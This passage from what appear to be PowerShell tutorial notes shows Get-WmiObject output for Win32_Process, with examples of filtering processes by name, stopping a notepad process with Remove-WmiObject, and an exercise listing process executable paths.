CreationClassName : Win32_Process CreationDate : 20170712123348.685360-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 3024 HandleCount : 341 InstallDate : KernelModeTime : 19327792 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 201161 OtherTransferCount : 7589924 PageFaults : 12646 PageFileUsage : 8156 ParentProcessId : 488 PeakPageFileUsage : 8188 PeakVirtualSize : 76333056 PeakWorkingSetSize : 9876 Priority : 8 PrivatePageCount : 8351744 ProcessId : 3024 QuotaNonPagedPoolUsage : 13 QuotaPagedPoolUsage : 57 QuotaPeakNonPagedPoolUsage : 40 QuotaPeakPagedPoolUsage : 58 ReadOperationCount : 73 ReadTransferCount : 1984308 SessionId : 0 Status : TerminationDate : ThreadCount : 7 UserModeTime : 9413536 VirtualSize : 69562368 WindowsVersion : 6.1.7600 WorkingSetSize : 9433088 WriteOperationCount : 835 WriteTransferCount : 1454446 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 341 VM : 69562368 WS : 9433088 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3236" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3236" Caption : powershell.exe CommandLine : "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712123353.342056-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3236 HandleCount : 519 InstallDate : KernelModeTime : 3905616 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 4376 OtherTransferCount : 46062 PageFaults : 12085 PageFileUsage : 24428 ParentProcessId : 980 PeakPageFileUsage : 37584 PeakVirtualSize : 195739648 PeakWorkingSetSize : 38424 Priority : 8 PrivatePageCount : 25014272 ProcessId : 3236 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 148 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 148 ReadOperationCount : 267 ReadTransferCount : 972300 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 7811232 VirtualSize : 184668160 WindowsVersion : 6.1.7600 WorkingSetSize : 37801984 WriteOperationCount : 3 WriteTransferCount : 6434 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 519 VM : 184668160 WS : 37801984 Path : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3244" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3244" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe CreationClassName : Win32_Process CreationDate : 20170712123353.452214-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 3244 HandleCount : 39 InstallDate : KernelModeTime : 8111664 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 172 OtherTransferCount : 824 PageFaults : 2443 PageFileUsage : 3840 ParentProcessId : 404 PeakPageFileUsage : 4984 PeakVirtualSize : 47939584 PeakWorkingSetSize : 7048 Priority : 8 PrivatePageCount : 3932160 ProcessId : 3244 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 46 QuotaPeakNonPagedPoolUsage : 3 QuotaPeakPagedPoolUsage : 47 ReadOperationCount : 22 ReadTransferCount : 11850 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 701008 VirtualSize : 47136768 WindowsVersion : 6.1.7600 WorkingSetSize : 6479872 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : conhost.exe Handles : 39 VM : 47136768 WS : 6479872 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3444" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3444" Caption : cmd.exe CommandLine : "C:\Windows\system32\cmd.exe" CreationClassName : Win32_Process CreationDate : 20170712124552.936782-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : cmd.exe ExecutablePath : C:\Windows\system32\cmd.exe ExecutionState : Handle : 3444 HandleCount : 23 InstallDate : KernelModeTime : 200288 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : cmd.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 259 OtherTransferCount : 1746 PageFaults : 576 PageFileUsage : 1760 ParentProcessId : 980 PeakPageFileUsage : 1760 PeakVirtualSize : 31256576 PeakWorkingSetSize : 2168 Priority : 8 PrivatePageCount : 1802240 ProcessId : 3444 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 33 QuotaPeakNonPagedPoolUsage : 6 QuotaPeakPagedPoolUsage : 33 ReadOperationCount : 1 ReadTransferCount : 11742 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 31256576 WindowsVersion : 6.1.7600 WorkingSetSize : 2097152 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : cmd.exe Handles : 23 VM : 31256576 WS : 2097152 Path : C:\Windows\system32\cmd.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3712" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3712" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe CreationClassName : Win32_Process CreationDate : 20170712124552.946796-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 3712 HandleCount : 36 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 170 OtherTransferCount : 758 PageFaults : 714 PageFileUsage : 604 ParentProcessId : 404 PeakPageFileUsage : 624 PeakVirtualSize : 42553344 PeakWorkingSetSize : 2696 Priority : 8 PrivatePageCount : 618496 ProcessId : 3712 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 37 QuotaPeakNonPagedPoolUsage : 3 QuotaPeakPagedPoolUsage : 45 ReadOperationCount : 15 ReadTransferCount : 12236 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 33808384 WindowsVersion : 6.1.7600 WorkingSetSize : 2752512 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : conhost.exe Handles : 36 VM : 33808384 WS : 2752512 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3524" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3524" Caption : python.exe CommandLine : python -m SimpleHTTPServer CreationClassName : Win32_Process CreationDate : 20170712124602.320275-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : python.exe ExecutablePath : C:\Python27\python.exe ExecutionState : Handle : 3524 HandleCount : 134 InstallDate : KernelModeTime : 1201728 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : python.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 42258 OtherTransferCount : 678289 PageFaults : 2591 PageFileUsage : 6324 ParentProcessId : 3444 PeakPageFileUsage : 6384 PeakVirtualSize : 72130560 PeakWorkingSetSize : 9872 Priority : 8 PrivatePageCount : 6475776 ProcessId : 3524 QuotaNonPagedPoolUsage : 6 QuotaPagedPoolUsage : 56 QuotaPeakNonPagedPoolUsage : 23 QuotaPeakPagedPoolUsage : 56 ReadOperationCount : 204 ReadTransferCount : 907444 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 701008 VirtualSize : 66035712 WindowsVersion : 6.1.7600 WorkingSetSize : 5103616 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : python.exe Handles : 134 VM : 66035712 WS : 5103616 Path : C:\Python27\python.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3136" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3136" Caption : powershell.exe CommandLine : "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712130457.189342-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : powershell.exe ExecutablePath : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3136 HandleCount : 384 InstallDate : KernelModeTime : 1402016 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3210 OtherTransferCount : 39824 PageFaults : 10441 PageFileUsage : 21412 ParentProcessId : 980 PeakPageFileUsage : 35928 PeakVirtualSize : 180490240 PeakWorkingSetSize : 37160 Priority : 8 PrivatePageCount : 21925888 ProcessId : 3136 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 135 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 135 ReadOperationCount : 267 ReadTransferCount : 978070 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 3905616 VirtualSize : 170201088 WindowsVersion : 6.1.7600 WorkingSetSize : 32100352 WriteOperationCount : 3 WriteTransferCount : 6434 PSComputerName : JOHN-PC ProcessName : powershell.exe Handles : 384 VM : 170201088 WS : 32100352 Path : C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2960" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2960" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe CreationClassName : Win32_Process CreationDate : 20170712130457.209371-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 2960 HandleCount : 39 InstallDate : KernelModeTime : 1201728 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 161 OtherTransferCount : 648 PageFaults : 1803 PageFileUsage : 4224 ParentProcessId : 404 PeakPageFileUsage : 4224 PeakVirtualSize : 47144960 PeakWorkingSetSize : 6612 Priority : 8 PrivatePageCount : 4325376 ProcessId : 2960 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 46 QuotaPeakNonPagedPoolUsage : 3 QuotaPeakPagedPoolUsage : 47 ReadOperationCount : 22 ReadTransferCount : 12622 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 300432 VirtualSize : 47136768 WindowsVersion : 6.1.7600 WorkingSetSize : 6746112 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : conhost.exe Handles : 39 VM : 47136768 WS : 6746112 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3408" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="3408" Caption : notepad.exe CommandLine : "C:\Windows\system32\NOTEPAD.EXE" C:\Users\John\Desktop\log.txt CreationClassName : Win32_Process CreationDate : 20170712130654.798456-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : notepad.exe ExecutablePath : C:\Windows\system32\NOTEPAD.EXE ExecutionState : Handle : 3408 HandleCount : 56 InstallDate : KernelModeTime : 600864 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : notepad.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 265 OtherTransferCount : 1230 PageFaults : 1104 PageFileUsage : 1008 ParentProcessId : 980 PeakPageFileUsage : 1008 PeakVirtualSize : 57073664 PeakWorkingSetSize : 4256 Priority : 8 PrivatePageCount : 1032192 ProcessId : 3408 QuotaNonPagedPoolUsage : 4 QuotaPagedPoolUsage : 58 QuotaPeakNonPagedPoolUsage : 4 QuotaPeakPagedPoolUsage : 58 ReadOperationCount : 2 ReadTransferCount : 19076 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 200288 VirtualSize : 57016320 WindowsVersion : 6.1.7600 WorkingSetSize : 4304896 WriteOperationCount : 1 WriteTransferCount : 6205 PSComputerName : JOHN-PC ProcessName : notepad.exe Handles : 56 VM : 57016320 WS : 4304896 Path : C:\Windows\system32\NOTEPAD.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1604" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="1604" Caption : wuauclt.exe CommandLine : "C:\Windows\system32\wuauclt.exe" CreationClassName : Win32_Process CreationDate : 20170712171611.519551-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : wuauclt.exe ExecutablePath : C:\Windows\system32\wuauclt.exe ExecutionState : Handle : 1604 HandleCount : 87 InstallDate : KernelModeTime : 200288 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wuauclt.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 581 OtherTransferCount : 3230 PageFaults : 1465 PageFileUsage : 1116 ParentProcessId : 940 PeakPageFileUsage : 1176 PeakVirtualSize : 74887168 PeakWorkingSetSize : 4552 Priority : 8 PrivatePageCount : 1142784 ProcessId : 1604 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 54 QuotaPeakNonPagedPoolUsage : 6 QuotaPeakPagedPoolUsage : 74 ReadOperationCount : 1 ReadTransferCount : 16278 SessionId : 1 Status : TerminationDate : ThreadCount : 3 UserModeTime : 100144 VirtualSize : 54349824 WindowsVersion : 6.1.7600 WorkingSetSize : 3743744 WriteOperationCount : 8 WriteTransferCount : 862 PSComputerName : JOHN-PC ProcessName : wuauclt.exe Handles : 87 VM : 54349824 WS : 3743744 Path : C:\Windows\system32\wuauclt.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2356" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="2356" Caption : WmiPrvSE.exe CommandLine : C:\Windows\system32\wbem\wmiprvse.exe CreationClassName : Win32_Process CreationDate : 20170712181550.475665-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : WmiPrvSE.exe ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe ExecutionState : Handle : 2356 HandleCount : 115 InstallDate : KernelModeTime : 100144 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : WmiPrvSE.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 423 OtherTransferCount : 1538 PageFaults : 1238 PageFileUsage : 1820 ParentProcessId : 608 PeakPageFileUsage : 1820 PeakVirtualSize : 26275840 PeakWorkingSetSize : 4460 Priority : 8 PrivatePageCount : 1863680 ProcessId : 2356 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 26 QuotaPeakNonPagedPoolUsage : 5 QuotaPeakPagedPoolUsage : 26 ReadOperationCount : 1 ReadTransferCount : 37802 SessionId : 0 Status : TerminationDate : ThreadCount : 7 UserModeTime : 200288 VirtualSize : 26275840 WindowsVersion : 6.1.7600 WorkingSetSize : 4567040 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : WmiPrvSE.exe Handles : 115 VM : 26275840 WS : 4567040 Path : C:\Windows\system32\wbem\wmiprvse.exe PS C:\Users\Administrator> ``` - ```Get-WmiObject``` - ```Filter``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name = "powershell.exe"} __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3416" Caption : powershell.exe CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3416 HandleCount : 523 InstallDate : KernelModeTime : 26718750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 144949 OtherTransferCount : 7251556 PageFaults : 300851 PageFileUsage : 110900 ParentProcessId : 1188 PeakPageFileUsage : 114860 PeakVirtualSize : 736120832 PeakWorkingSetSize : 123328 Priority : 8 PrivatePageCount : 113561600 ProcessId : 3416 QuotaNonPagedPoolUsage : 40 QuotaPagedPoolUsage : 577 QuotaPeakNonPagedPoolUsage : 46 QuotaPeakPagedPoolUsage : 578 ReadOperationCount : 1110 ReadTransferCount : 3557444 SessionId : 1 Status : TerminationDate : ThreadCount : 12 UserModeTime : 176250000 VirtualSize : 733343744 WindowsVersion : 6.3.9600 WorkingSetSize : 124723200 WriteOperationCount : 80 WriteTransferCount : 18596 PSComputerName : WIN-2012-DC ProcessName : powershell.exe Handles : 523 VM : 733343744 WS : 124723200 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PS C:\Users\Administrator> ``` - ```Get-WmiObject``` - ```Where-Object``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -eq "powershell.exe"} __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3416" Caption : powershell.exe CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3416 HandleCount : 564 InstallDate : KernelModeTime : 26718750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 146742 OtherTransferCount : 7521736 PageFaults : 301103 PageFileUsage : 110920 ParentProcessId : 1188 PeakPageFileUsage : 114860 PeakVirtualSize : 736120832 PeakWorkingSetSize : 123328 Priority : 8 PrivatePageCount : 113582080 ProcessId : 3416 QuotaNonPagedPoolUsage : 40 QuotaPagedPoolUsage : 577 QuotaPeakNonPagedPoolUsage : 46 QuotaPeakPagedPoolUsage : 578 ReadOperationCount : 1110 ReadTransferCount : 3557444 SessionId : 1 Status : TerminationDate : ThreadCount : 12 UserModeTime : 176875000 VirtualSize : 734392320 WindowsVersion : 6.3.9600 WorkingSetSize : 124850176 WriteOperationCount : 80 WriteTransferCount : 18596 PSComputerName : WIN-2012-DC ProcessName : powershell.exe Handles : 564 VM : 734392320 WS : 124850176 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PS C:\Users\Administrator> ``` - ```Get-WmiObject``` - ```Query ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name="powershell.exe"} __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3416" Caption : powershell.exe CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3416 HandleCount : 546 InstallDate : KernelModeTime : 27187500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 149572 OtherTransferCount : 8065898 PageFaults : 301349 PageFileUsage : 111084 ParentProcessId : 1188 PeakPageFileUsage : 114860 PeakVirtualSize : 736120832 PeakWorkingSetSize : 123328 Priority : 8 PrivatePageCount : 113750016 ProcessId : 3416 QuotaNonPagedPoolUsage : 39 QuotaPagedPoolUsage : 577 QuotaPeakNonPagedPoolUsage : 46 QuotaPeakPagedPoolUsage : 578 ReadOperationCount : 1110 ReadTransferCount : 3557444 SessionId : 1 Status : TerminationDate : ThreadCount : 11 UserModeTime : 177656250 VirtualSize : 733859840 WindowsVersion : 6.3.9600 WorkingSetSize : 125005824 WriteOperationCount : 80 WriteTransferCount : 18596 PSComputerName : WIN-2012-DC ProcessName : powershell.exe Handles : 546 VM : 733859840 WS : 125005824 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name="notepad.exe"} __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="956" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="956" Caption : notepad.exe CommandLine : "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\log.txt CreationClassName : Win32_Process CreationDate : 20170712153213.828260-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : notepad.exe ExecutablePath : C:\Windows\system32\NOTEPAD.EXE ExecutionState : Handle : 956 HandleCount : 95 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : notepad.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 207 OtherTransferCount : 1744 PageFaults : 4672 PageFileUsage : 3024 ParentProcessId : 1188 PeakPageFileUsage : 4012 PeakVirtualSize : 151597056 PeakWorkingSetSize : 10756 Priority : 8 PrivatePageCount : 3096576 ProcessId : 956 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 278 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 289 ReadOperationCount : 1 ReadTransferCount : 60 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 625000 VirtualSize : 148074496 WindowsVersion : 6.3.9600 WorkingSetSize : 10457088 WriteOperationCount : 10 WriteTransferCount : 672390 PSComputerName : WIN-2012-DC ProcessName : notepad.exe Handles : 95 VM : 148074496 WS : 10457088 Path : C:\Windows\system32\NOTEPAD.EXE PS C:\Users\Administrator> ``` - ```Remove-WmiObject``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name="notepad.exe"} | Remove-WmiObject ``` ###### [Excercise](http://windowsitpro.com/powershell/powershell-basics-filtering-objects) - List the path of Executables for each process on your machine. ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process | Select-Object -Property Name,Path Name Path ---- ---- System Idle Process System smss.exe csrss.exe csrss.exe wininit.exe C:\Windows\system32\wininit.exe winlogon.exe C:\Windows\system32\winlogon.exe services.exe lsass.exe C:\Windows\system32\lsass.exe svchost.exe C:\Windows\system32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe dwm.exe C:\Windows\system32\dwm.exe VBoxService.exe C:\Windows\System32\VBoxService.exe svchost.exe C:\Windows\System32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe spoolsv.exe C:\Windows\System32\spoolsv.exe Microsoft.ActiveDirectory.WebServices.exe C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe dfsrs.exe C:\Windows\system32\DFSRs.exe dns.exe C:\Windows\system32\dns.exe ismserv.exe C:\Windows\System32\ismserv.exe wlms.exe C:\Windows\system32\wlms\wlms.exe dfssvc.exe C:\Windows\system32\dfssvc.exe vds.exe C:\Windows\System32\vds.exe svchost.exe C:\Windows\System32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe svchost.exe C:\Windows\system32\svchost.exe msdtc.exe C:\Windows\System32\msdtc.exe taskhostex.exe C:\Windows\system32\taskhostex.exe explorer.exe C:\Windows\Explorer.EXE VBoxTray.exe C:\Windows\System32\VBoxTray.exe cmd.exe C:\Windows\system32\cmd.exe conhost.exe C:\Windows\system32\conhost.exe python.exe C:\Python27\python.exe firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe conhost.exe C:\Windows\system32\conhost.exe WmiPrvSE.exe 